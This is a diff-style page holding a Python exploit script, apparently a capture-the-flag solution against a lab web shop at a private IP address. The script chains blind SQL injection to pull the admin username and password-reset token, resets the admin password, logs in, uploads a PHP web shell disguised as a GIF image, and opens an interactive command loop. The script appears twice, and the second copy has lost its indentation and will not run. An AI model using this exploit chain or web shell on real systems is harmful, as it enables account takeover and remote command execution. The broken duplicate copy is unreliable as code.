cyberheartmi9 · July 9, 2023 20:40
diff --git a/SecureCode-1.py b/SecureCode-1.py
 import requests
 import sys
 import re
 import random
 import string


 banner="""



 ███████╗███████╗ ██████╗██╗   ██╗██████╗ ███████╗ ██████╗ ██████╗ ██████╗ ███████╗    ██╗
 ██╔════╝██╔════╝██╔════╝██║   ██║██╔══██╗██╔════╝██╔════╝██╔═══██╗██╔══██╗██╔════╝██╗███║
 ███████╗█████╗  ██║     ██║   ██║██████╔╝█████╗  ██║     ██║   ██║██║  ██║█████╗  ╚═╝╚██║
 ╚════██║██╔══╝  ██║     ██║   ██║██╔══██╗██╔══╝  ██║     ██║   ██║██║  ██║██╔══╝  ██╗ ██║
 ███████║███████╗╚██████╗╚██████╔╝██║  ██║███████╗╚██████╗╚██████╔╝██████╔╝███████╗╚═╝ ██║
 ╚══════╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝  ╚═╝╚══════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝    ╚═╝
                                                                                         

 @intx0x80


 """



 s=requests.session()
 all = string.ascii_letters + string.digits
 password="".join(random.sample(all,10))
 all = string.ascii_letters
 shell_name="".join(random.sample(all,4))



 # SQL inj

 def sql_inj(ip,inj_query):

    for i in range(32,126):
        #
        req=requests.get("http://%s/item/viewItem.php?id=%s" %(str(ip),inj_query.replace("[CHAR]",str(i))),proxies={"http":"127.0.0.1:8080"})
        if "404" in str(req.status_code):
            return i
    return None




 def extract_data(ip,inject_query):
    extracted=""
    for j in range(1,60):
        inject="122 or (select ascii(substr((select %s from user where id_level=1),%d,1)))=[CHAR]=1 limit 1-- -"%(inject_query,j)
        ret_value=sql_inj(ip,inject)
        if ret_value:
            extracted+=chr(ret_value)
            extract_chars=chr(ret_value)
            sys.stdout.write(extract_chars)
            sys.stdout.flush()
        else:
            print("\nFinish\n")
            break;
    return extracted

 # request token for adminn

 def request_token(ip,username):
    data={"username":username}
    req=requests.post("http://%s/login/resetPassword.php"%(ip),data=data,proxies={"http":"127.0.0.1:8080"})
    if "Success!" in req.text:
        print("[+] Token for admin token send for %s \n"%(username))

 # reset admin password

 def reset_admin_password(ip,token,password):
    data={"token":token,"password":password}
    req=requests.post("http://%s/login/doChangePassword.php"%(ip),data=data,proxies={"http":"127.0.0.1:8080"})
    if "Success!" in req.text:
        print("[+] password for change [ %s ]"%(password))

 # Login as admin

 def login(ip,username,password):
    data={"username":username,"password":password}
    req=s.post("http://%s/login/checkLogin.php"%(ip),data=data,allow_redirects=True)
    if "Username/Password is not correct" not in req.text:
        print("[+] Login success")
    pattern = r'FLAG1: ([a-f0-9]+)'
    matches = re.search(pattern, req.text)
    if matches:

        flag = matches.group(1)
        print("Flag:", flag)



 # Upload Shell

 def upload_shell(ip):
    data={"id_user":(None,1),"name":(None,"shell"),"image":("%s.phar"%(str(shell_name)), "GIF89a; <?php system($_GET['cmd']); ?>"),"description":(None,"pwner"),"price":(None,1337)}
    s.post("http://%s/item/newItem.php"%(ip),files=data,allow_redirects=True,proxies={"http":"127.0.0.1:8080"})
    print("[+] Uploading Shell.......\n")
    print("[+] http://%s/item/image/%s.phar"%(ip,shell_name))


 # CMD shell

 def shell(ip,shell_name,cmd):

    data={"cmd":cmd}
    req=s.get("http://%s/item/image/%s.phar?cmd=%s"%(ip,shell_name,cmd))
    cmd_data=req.text[8:]
    print(cmd_data)
    




 print(banner)


 print("[+] extract admin username")
 query="username"
 username=extract_data("192.168.122.112",query)
 print("[+] Username: %s"%(username))

 request_token("192.168.122.112",username)



 print("[+] extract reset password Token")
 query="token"
 token=extract_data("192.168.122.112",query)
 print("[+] Token : %s"%(token))

 print("[+] reset admin password")
 reset_admin_password("192.168.122.112",token,password)
 print("[+] username : %s , password : %s "%(username,password))

 print("[+] Login as admin")
 login("192.168.122.112",username,password)
 upload_shell("192.168.122.112")

 while True:
    #
    cmd=input("cmd > ")
    shell("192.168.122.112",shell_name,cmd)
    if "exit" in cmd:
        exit(0)
	import requests
	import sys
	import re
	import random
	import string


	banner="""



	███████╗███████╗ ██████╗██╗ ██╗██████╗ ███████╗ ██████╗ ██████╗ ██████╗ ███████╗ ██╗
	██╔════╝██╔════╝██╔════╝██║ ██║██╔══██╗██╔════╝██╔════╝██╔═══██╗██╔══██╗██╔════╝██╗███║
	███████╗█████╗ ██║ ██║ ██║██████╔╝█████╗ ██║ ██║ ██║██║ ██║█████╗ ╚═╝╚██║
	╚════██║██╔══╝ ██║ ██║ ██║██╔══██╗██╔══╝ ██║ ██║ ██║██║ ██║██╔══╝ ██╗ ██║
	███████║███████╗╚██████╗╚██████╔╝██║ ██║███████╗╚██████╗╚██████╔╝██████╔╝███████╗╚═╝ ██║
	╚══════╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝


	@intx0x80


	"""



	s=requests.session()
	all = string.ascii_letters + string.digits
	password="".join(random.sample(all,10))
	all = string.ascii_letters
	shell_name="".join(random.sample(all,4))



	# SQL inj

	def sql_inj(ip,inj_query):

	for i in range(32,126):
	#
	req=requests.get("http://%s/item/viewItem.php?id=%s" %(str(ip),inj_query.replace("[CHAR]",str(i))),proxies={"http":"127.0.0.1:8080"})
	if "404" in str(req.status_code):
	return i
	return None




	def extract_data(ip,inject_query):
	extracted=""
	for j in range(1,60):
	inject="122 or (select ascii(substr((select %s from user where id_level=1),%d,1)))=[CHAR]=1 limit 1-- -"%(inject_query,j)
	ret_value=sql_inj(ip,inject)
	if ret_value:
	extracted+=chr(ret_value)
	extract_chars=chr(ret_value)
	sys.stdout.write(extract_chars)
	sys.stdout.flush()
	else:
	print("\nFinish\n")
	break;
	return extracted

	# request token for adminn

	def request_token(ip,username):
	data={"username":username}
	req=requests.post("http://%s/login/resetPassword.php"%(ip),data=data,proxies={"http":"127.0.0.1:8080"})
	if "Success!" in req.text:
	print("[+] Token for admin token send for %s \n"%(username))

	# reset admin password

	def reset_admin_password(ip,token,password):
	data={"token":token,"password":password}
	req=requests.post("http://%s/login/doChangePassword.php"%(ip),data=data,proxies={"http":"127.0.0.1:8080"})
	if "Success!" in req.text:
	print("[+] password for change [ %s ]"%(password))

	# Login as admin

	def login(ip,username,password):
	data={"username":username,"password":password}
	req=s.post("http://%s/login/checkLogin.php"%(ip),data=data,allow_redirects=True)
	if "Username/Password is not correct" not in req.text:
	print("[+] Login success")
	pattern = r'FLAG1: ([a-f0-9]+)'
	matches = re.search(pattern, req.text)
	if matches:

	flag = matches.group(1)
	print("Flag:", flag)



	# Upload Shell

	def upload_shell(ip):
	data={"id_user":(None,1),"name":(None,"shell"),"image":("%s.phar"%(str(shell_name)), "GIF89a; <?php system($_GET['cmd']); ?>"),"description":(None,"pwner"),"price":(None,1337)}
	s.post("http://%s/item/newItem.php"%(ip),files=data,allow_redirects=True,proxies={"http":"127.0.0.1:8080"})
	print("[+] Uploading Shell.......\n")
	print("[+] http://%s/item/image/%s.phar"%(ip,shell_name))


	# CMD shell

	def shell(ip,shell_name,cmd):

	data={"cmd":cmd}
	req=s.get("http://%s/item/image/%s.phar?cmd=%s"%(ip,shell_name,cmd))
	cmd_data=req.text[8:]
	print(cmd_data)





	print(banner)


	print("[+] extract admin username")
	query="username"
	username=extract_data("192.168.122.112",query)
	print("[+] Username: %s"%(username))

	request_token("192.168.122.112",username)



	print("[+] extract reset password Token")
	query="token"
	token=extract_data("192.168.122.112",query)
	print("[+] Token : %s"%(token))

	print("[+] reset admin password")
	reset_admin_password("192.168.122.112",token,password)
	print("[+] username : %s , password : %s "%(username,password))

	print("[+] Login as admin")
	login("192.168.122.112",username,password)
	upload_shell("192.168.122.112")

	while True:
	#
	cmd=input("cmd > ")
	shell("192.168.122.112",shell_name,cmd)
	if "exit" in cmd:
	exit(0)